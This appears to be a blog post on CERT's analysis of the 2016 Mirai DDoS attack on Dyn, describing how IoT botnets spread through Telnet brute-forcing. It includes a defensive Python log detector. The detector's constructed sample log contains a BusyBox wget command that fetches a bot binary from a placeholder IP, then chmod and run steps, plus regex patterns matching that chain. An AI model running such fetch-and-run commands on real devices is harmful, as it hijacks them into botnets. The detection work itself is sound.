IoT Botnet and DDoS Attacks Analysis from CERT
The Computer Emergency Response Team (CERT) began an in-depth analysis of the DDoS attack that hit the DNS service provider Dyn on Oct 21, 2016. According to the CERT analysis, the incident involved multiple factors, in particular security vulnerabilities in IoT devices. Beyond the DDoS attack and DNS security visible on the surface, many other issues deserve greater attention and further research.
Dyn said that this DDoS attack involved tens of millions of IP addresses, most of which belonged to IoT and smart devices. Dyn believed that the attack came from malicious code named “Mirai.” The hacker groups NewWorldHackers and Anonymous claimed responsibility for the attack.
The scale of botnets built on IoT devices keeps growing. Typical IoT DDoS botnet families include the CCTV series that appeared in 2013, the ChiekenMM series (including 10771, 10991, 25000, and 36000), and Linux-based cross-platform DDoS botnet families (such as BillGates, Mayday, PNScan, and Gafgyt).
IoT DDoS botnets (Mirai included) spread to IoT devices by brute-forcing the Telnet port with lists of common passwords, or simply by logging on with the device's default password. Once logged on over Telnet, the attacker uses tools embedded in the device, such as BusyBox and wget, to download the DDoS bot, sets its executable attribute, and runs it, taking control of the device. Because IoT devices differ in CPU instruction set architecture, some botnets first determine the system architecture and then select a MIPS, ARM, or x86 sample to download. Once these samples are running, the bots receive attack commands and launch attacks.
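Detection logic for the infection chain described above, added here as an example (not part of the CERT analysis): it correlates Telnet logon records with the subsequent shell commands of each source and flags a full download, chmod and run sequence. The log format and all sample lines are constructed.

```python
import re

# Constructed sample in the shape of a telnetd/shell audit log (not real data):
# one source brute-forces Telnet, logs on with a default account, then fetches
# and runs a bot via BusyBox; a second source logs on and runs a harmless command.
SAMPLE_LOG = """\
2016-10-21T11:02:01 telnetd: login failed user=root from=198.51.100.23
2016-10-21T11:02:02 telnetd: login failed user=admin from=198.51.100.23
2016-10-21T11:02:03 telnetd: login ok user=root from=198.51.100.23
2016-10-21T11:02:04 sh: from=198.51.100.23 cmd=/bin/busybox wget http://203.0.113.9/x.mips -O /tmp/.x
2016-10-21T11:02:05 sh: from=198.51.100.23 cmd=chmod +x /tmp/.x
2016-10-21T11:02:05 sh: from=198.51.100.23 cmd=/tmp/.x
2016-10-21T11:03:10 telnetd: login ok user=operator from=192.0.2.7
2016-10-21T11:03:12 sh: from=192.0.2.7 cmd=uptime
"""

LOGIN = re.compile(r"telnetd: login (ok|failed) user=(\S+) from=(\S+)")
CMD = re.compile(r"sh: from=(\S+) cmd=(.*)$")
# Stages of the Telnet infection chain: fetch with an embedded tool (group 1 is
# the output path), mark the file executable, then run it from a writable path.
DOWNLOAD = re.compile(r"\b(?:busybox\s+)?(?:wget|tftp)\b.*?-O\s*(\S+)")
CHMOD = re.compile(r"\bchmod\s+\+x\s+(\S+)")
EXEC = re.compile(r"^((?:/tmp|/dev|/var)/\S+|\./\S+)$")

def analyze(log_text, fail_threshold=2):
    # Per source that logged on: did it brute-force Telnet first, and which
    # dropped files went through the complete download -> chmod -> run chain?
    failures, sessions = {}, {}
    for line in log_text.splitlines():
        m = LOGIN.search(line)
        if m:
            status, user, src = m.groups()
            if status == "failed":
                failures[src] = failures.get(src, 0) + 1
            else:
                sessions[src] = {"user": user, "got": set(), "chmod": set(), "ran": set()}
            continue
        m = CMD.search(line)
        if not m or m.group(1) not in sessions:
            continue  # command from a source with no observed logon
        s, cmd = sessions[m.group(1)], m.group(2).strip()
        for key, rx in (("got", DOWNLOAD), ("chmod", CHMOD), ("ran", EXEC)):
            hit = rx.search(cmd)
            if hit:
                s[key].add(hit.group(1))
    # Only a file that was fetched, made executable and run counts as a chain.
    return {src: {"user": s["user"],
                  "brute_force": failures.get(src, 0) >= fail_threshold,
                  "infection_chain": sorted(s["got"] & s["chmod"] & s["ran"])}
            for src, s in sessions.items()}
```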
Undoubtedly, the DNS is an information infrastructure, but the IoT botnet is not merely a tool for launching this attack. The IoT is also an essential supporting node of the future information society. The IoT is a network that extends and expands the Internet; it is not merely a network. Using embedded sensors, devices, and systems built on awareness and information-sensing technologies, the IoT can build complex applications that span the physical and social space.
Related Blog Posts
On October 21, 2016, a DDoS attack hit the DNS service provider Dyn. The company is a major DNS provider for many companies in the United States.
On the morning of the attack, Dyn confirmed that its DNS infrastructure on the East Coast had come under DDoS attack from sources around the world. The attacks severely affected the business of Dyn’s DNS customers; worse, customers’ websites became inaccessible. The attacks lasted until 13:45 ET. Dyn said on its official website that it would track down the issue and release an incident report.
This article discusses the importance of IoT device security by looking at CERT’s interpretation of the infamous 2016 DDoS attack.
Alibaba Cloud Elastic Compute Service (ECS) provides a faster and more powerful way to run your cloud applications than traditional physical servers can. It lets you meet your cloud needs effectively: with ECS you can do more on the latest generation of CPUs and protect your instance from DDoS and Trojan attacks.
In this tutorial, we will talk about the best practices for provisioning your Ubuntu 16.04 server hosted on an Alibaba Cloud Elastic Compute Service (ECS) instance.
Managed Security Service (MSS) is available for Alibaba Cloud Security DDoS Protection. Once you activate MSS for the DDoS Protection service, you receive professional, dedicated technical support from Alibaba Cloud Security experts on implementing and using Alibaba Cloud DDoS Protection.
Anti-Bot Service (Anti-Bot) is fully compatible with Anti-DDoS Pro. You can deploy both Anti-Bot and Anti-DDoS Pro for your origin server in this schema: Anti-DDoS Pro (ingress to DDoS protection) > Anti-Bot (intermediate layer for application-layer protection) > origin server.
Alibaba Cloud Managed Security Service is a security technology and consulting service designed to establish and optimize security protection systems so that users can keep their business on the cloud secure. Built on years of security experience, Alibaba Cloud Managed Security Service applies best practices developed by leading security experts for the benefit of cloud service users.
Anti-DDoS Pro is a value-added service used to protect servers, including external servers hosted in Mainland China, against volumetric DDoS attacks. You can redirect attack traffic to Anti-DDoS Pro to ensure the stability and availability of origin sites.